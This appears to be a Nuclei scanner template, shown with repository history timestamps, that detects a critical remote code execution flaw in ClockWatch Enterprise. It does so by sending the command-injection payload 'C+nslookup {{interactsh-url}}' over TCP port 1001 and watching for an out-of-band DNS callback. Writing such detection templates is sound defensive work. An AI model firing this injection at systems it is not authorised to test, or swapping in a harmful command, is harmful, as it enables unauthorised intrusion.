nuclei-templates/network/vulnerabilities/clockwatch-enterprise-rce.yaml

38 lines
963 B
YAML
Raw Normal View History

id: clockwatch-enterprise-rce
info:
name: ClockWatch Enterprise - Remote Code Execution
author: gy741
severity: critical
2022-05-31 09:01:19 +00:00
description: |
ClockWatch Enterprise is susceptible to remote code execution.
reference:
- https://blog.grimm-co.com/2021/07/old-dog-same-tricks.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-77
metadata:
max-request: 1
tags: clockwatch,rce,network,tcp
tcp:
- inputs:
- data: "C+nslookup {{interactsh-url}}"
host:
- "{{Hostname}}"
2023-09-16 19:35:21 +00:00
port: 1001
2021-07-08 08:50:18 +00:00
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
2021-07-08 08:30:01 +00:00
- type: word
words:
- "OK-C"
# digest: 490a0046304402204ac5c89d721c125179b93ce1e7bff7f075764402e07d8a0b44f769d38fcb670602202ea48b82347037486a5b7bfd589aa594506665d41c5082444959a8019ffab69b:922c64590222798bb761d5b6d8e72950